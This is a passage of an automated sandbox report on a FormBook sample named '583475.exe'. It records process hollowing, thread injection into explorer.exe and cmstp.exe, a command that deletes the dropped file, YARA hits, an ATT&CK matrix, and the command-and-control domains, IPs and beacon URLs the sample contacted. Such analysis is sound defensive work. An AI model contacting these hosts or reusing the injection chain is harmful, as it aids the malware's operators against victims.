          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F00EA5 mov eax, dword ptr fs:[00000030h]17_2_04F00EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FAB0 mov eax, dword ptr fs:[00000030h]17_2_04E6FAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFE87 mov eax, dword ptr fs:[00000030h]17_2_04ECFE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]17_2_04E6D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6D294 mov eax, dword ptr fs:[00000030h]17_2_04E6D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4766D mov eax, dword ptr fs:[00000030h]17_2_04E4766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]17_2_04EEB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEB260 mov eax, dword ptr fs:[00000030h]17_2_04EEB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08A62 mov eax, dword ptr fs:[00000030h]17_2_04F08A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5AE73 mov eax, dword ptr fs:[00000030h]17_2_04E5AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E7927A mov eax, dword ptr fs:[00000030h]17_2_04E7927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39240 mov eax, dword ptr fs:[00000030h]17_2_04E39240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E47E41 mov eax, dword ptr fs:[00000030h]17_2_04E47E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC4257 mov eax, dword ptr fs:[00000030h]17_2_04EC4257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3E620 mov eax, dword ptr fs:[00000030h]17_2_04E3E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFE3F mov eax, dword ptr fs:[00000030h]17_2_04EEFE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C600 mov eax, dword ptr fs:[00000030h]17_2_04E3C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E68E00 mov eax, dword ptr fs:[00000030h]17_2_04E68E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48A0A mov eax, dword ptr fs:[00000030h]17_2_04E48A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]17_2_04E3AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AA16 mov eax, dword ptr fs:[00000030h]17_2_04E3AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E53A1C mov eax, dword ptr fs:[00000030h]17_2_04E53A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]17_2_04E6A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A61C mov eax, dword ptr fs:[00000030h]17_2_04E6A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E603E2 mov eax, dword ptr fs:[00000030h]17_2_04E603E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E737F5 mov eax, dword ptr fs:[00000030h]17_2_04E737F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]17_2_04EB53CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB53CA mov eax, dword ptr fs:[00000030h]17_2_04EB53CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F05BA5 mov eax, dword ptr fs:[00000030h]17_2_04F05BA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF138A mov eax, dword ptr fs:[00000030h]17_2_04EF138A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]17_2_04E41B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E41B8F mov eax, dword ptr fs:[00000030h]17_2_04E41B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EED380 mov ecx, dword ptr fs:[00000030h]17_2_04EED380
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E48794 mov eax, dword ptr fs:[00000030h]17_2_04E48794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62397 mov eax, dword ptr fs:[00000030h]17_2_04E62397
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6B390 mov eax, dword ptr fs:[00000030h]17_2_04E6B390
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7794 mov eax, dword ptr fs:[00000030h]17_2_04EB7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB60 mov ecx, dword ptr fs:[00000030h]17_2_04E3DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4FF60 mov eax, dword ptr fs:[00000030h]17_2_04E4FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08F6A mov eax, dword ptr fs:[00000030h]17_2_04F08F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]17_2_04E63B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E63B7A mov eax, dword ptr fs:[00000030h]17_2_04E63B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3DB40 mov eax, dword ptr fs:[00000030h]17_2_04E3DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4EF40 mov eax, dword ptr fs:[00000030h]17_2_04E4EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08B58 mov eax, dword ptr fs:[00000030h]17_2_04F08B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3F358 mov eax, dword ptr fs:[00000030h]17_2_04E3F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]17_2_04E34F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E34F2E mov eax, dword ptr fs:[00000030h]17_2_04E34F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6E730 mov eax, dword ptr fs:[00000030h]17_2_04E6E730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]17_2_04E6A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A70E mov eax, dword ptr fs:[00000030h]17_2_04E6A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5F716 mov eax, dword ptr fs:[00000030h]17_2_04E5F716
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF131B mov eax, dword ptr fs:[00000030h]17_2_04EF131B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]17_2_04ECFF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECFF10 mov eax, dword ptr fs:[00000030h]17_2_04ECFF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]17_2_04F0070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0070D mov eax, dword ptr fs:[00000030h]17_2_04F0070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00409B30 LdrLoadDll,7_2_00409B30
          Source: C:\Users\user\Desktop\583475.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.appsdeals14.com
          Source: C:\Windows\explorer.exeDomain query: www.tinyhollywood.com
          Source: C:\Windows\explorer.exeNetwork Connect: 68.66.224.28 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 9D0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: A7E008Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\583475.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\583475.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: explorer.exe, 00000009.00000000.742102073.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000009.00000000.759241300.0000000001080000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.921404234.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Users\user\Desktop\583475.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\583475.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection812NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 510246 Sample: 583475.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 34 www.eeeptou.xyz 2->34 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Yara detected FormBook 2->56 58 5 other signatures 2->58 10 583475.exe 15 4 2->10         started        signatures3 process4 dnsIp5 42 www.google.com 142.250.185.228, 443, 49757 GOOGLEUS United States 10->42 30 C:\Users\user\AppData\...\AddInProcess32.exe, PE32 10->30 dropped 32 C:\Users\user\AppData\...\583475.exe.log, ASCII 10->32 dropped 60 Writes to foreign memory regions 10->60 62 Allocates memory in foreign processes 10->62 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->64 66 Injects a PE file into a foreign processes 10->66 15 AddInProcess32.exe 10->15         started        file6 signatures7 process8 signatures9 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 2 other signatures 15->74 18 cmstp.exe 15->18         started        21 explorer.exe 15->21 injected 24 autofmt.exe 15->24         started        process10 dnsIp11 44 Modifies the context of a thread in another process (thread injection) 18->44 46 Maps a DLL or memory area into another process 18->46 48 Tries to detect virtualization through RDTSC time measurements 18->48 26 cmd.exe 1 18->26         started        36 appsdeals14.com 68.66.224.28, 49835, 80 A2HOSTINGUS United States 21->36 38 www.tinyhollywood.com 21->38 40 2 other IPs or domains 21->40 50 System process connects to network (likely due to code injection or exploit) 21->50 signatures12 process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          583475.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\AddInProcess32.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.0.AddInProcess32.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.AddInProcess32.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.AddInProcess32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.0.AddInProcess32.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.eeeptou.xyz/uat8/0%Avira URL Cloudsafe
          http://ns.adobe.c/gE0%Avira URL Cloudsafe
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ns.adobe.cobjE0%Avira URL Cloudsafe
          http://ns.ado/1E0%Avira URL Cloudsafe
          http://ns.d0%URL Reputationsafe
          http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXAD0%Avira URL Cloudsafe
          http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXAD0%Avira URL Cloudsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.eeeptou.xyz
          104.21.96.92
          truetrue
            unknown
            tinyhollywood.com
            34.102.136.180
            truefalse
              unknown
              www.google.com
              142.250.185.228
              truefalse
                high
                appsdeals14.com
                68.66.224.28
                truetrue
                  unknown
                  www.appsdeals14.com
                  unknown
                  unknowntrue
                    unknown
                    www.tinyhollywood.com
                    unknown
                    unknowntrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.eeeptou.xyz/uat8/true
                      • Avira URL Cloud: safe
                      low
                      http://www.tinyhollywood.com/uat8/?7n=GRDJ3ughmVrqUFdKRM8Q0h4JrA2wYJd2LMNbPLjm/ZbIfdCCVia0cPEPKDDb+4lh8gF7&_2Jp=lPpXADfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.appsdeals14.com/uat8/?7n=6Y3MMElcCL8ncUt/K0lRUija0CRc99ofqSlJjt4IDKVpKgRu3E5zG/kW1DnZY4iUvzuw&_2Jp=lPpXADtrue
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/false
                        high

